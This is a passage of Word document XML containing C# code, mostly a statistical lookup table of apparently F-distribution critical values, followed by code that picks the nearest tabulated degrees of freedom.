    <w:p w14:paraId="645A59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 2.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791CB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6), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5EF7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8), 2.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4706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2), 1.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE6C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6), 1.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F86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4), 1.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C05A2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0), 1.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F2F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1), 1.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E60CAB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7480D4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 3.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F12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 3.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79168A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3), 2.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC55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4), 2.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD854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 2.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930E3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6), 2.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23932D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8), 2.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603965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2), 1.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150806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6), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF2CD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4), 1.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B78D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0), 1.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA3F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1), 1.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00336E6C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501FDA5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 3.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108CC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 3.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB39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3), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D372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4), 2.46},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA42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 2.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10006E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6), 2.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8DD6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8), 2.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6550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2), 1.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C496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6), 1.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C97C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4), 1.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B25B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0), 1.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BB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1), 1.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980E045" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702894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 3.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE7F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 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8B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3), 2.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C2A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4), 2.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151145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 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B020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6), 2.17},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D0CE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8), 2.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A815E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2), 1.83},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00102E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6), 1.72},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C83F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4), 1.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A93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0), 1.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A4A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1), 1.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD2A32" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA885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 3.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050F8DBC"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50, 2), 3.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD0A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3), 2.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F558D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4), 2.43},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00283E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 2.27},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F921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6), 2.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90B7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8), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4BE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2), 1.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D9E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6), 1.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488416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24), 1.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E719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0), 1.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719F3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1), 1.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9E8F0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065A42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 3.89},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA4B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 3.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2AF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3), 2.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140E5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4), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A018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 2.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD00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6), 2.14},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A614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8), 1.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2C8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2), 1.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6F5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6), 1.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC6AC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4), 1.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD138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0), 1.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E5F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1), 1.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260E9A6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF02D8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 3.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0FF5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 3.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52BE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3), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B99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4), 2.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CF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 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7832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6), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A7C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8), 1.97},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB3B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2), 1.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23746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6), 1.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413569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4), 1.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C55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0), 1.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947E5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1), 1.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46486289" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F8F2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 3.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268BF0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 3.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61904B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3), 2.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779BAE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4), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73E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 2.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5523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6), 2.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A28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8), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E040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2), 1.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CD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6), 1.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D20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4), 1.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505980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0), 1.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493C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1), 1.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A8BF8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A8603F"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00, 1), 3.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680F8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 3.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC54A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3), 2.62},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA7F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4), 2.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C7A5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 2.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18F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6), 2.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE969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8), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71A4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2), 1.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B025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6), 1.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8EF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4), 1.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF0F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0), 1.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F0B2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1), 1.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB9C82" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AFE4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 3.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECE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 3.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33126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3), 2.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64657C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4), 2.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246385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 2.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909C9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6), 2.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D67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8), 1.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB0D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2), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A42C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6), 1.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76F9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4), 1.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DEF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0), 1.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A57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1), 1.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA51DC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB358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 3.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6103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 2.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB12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3), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C57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4), 2.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60678E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 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCA2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6), 2.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E9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8), 1.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB6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2), 1.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21955A7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6), 1.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD8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4), 1.52},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D00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0), 1.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB188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1), 1.00}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9B533" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>endregion</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="593935B3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CDFB82"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AxArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new int[] { 1, 2, 3, 4, 5, 6, 8, 12, 16, 24, 50, 51 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333657C9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D27E48" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmpA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14436CD8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B36864"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AxArr.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8C0EE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE6D5D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmpA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> &gt;=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E4648D9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965924A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmpA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> =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8A9D242" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</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55F422B7" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4A02C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE17BB9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0754237B"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yArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new int[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 35, 40, 45, 50, 60, 70, 80, 90, 100, 125, 150, 200, 300, 400, 500, 1000, 1001 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1CCCC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = df;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A80E9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB0131C"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yArr.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D9CFF1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B484A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> &gt;=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0FE0FC67" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FB3C4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> =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37E03075" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfyArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAFD292" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2DEB41" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6E9A4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>neededFtableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
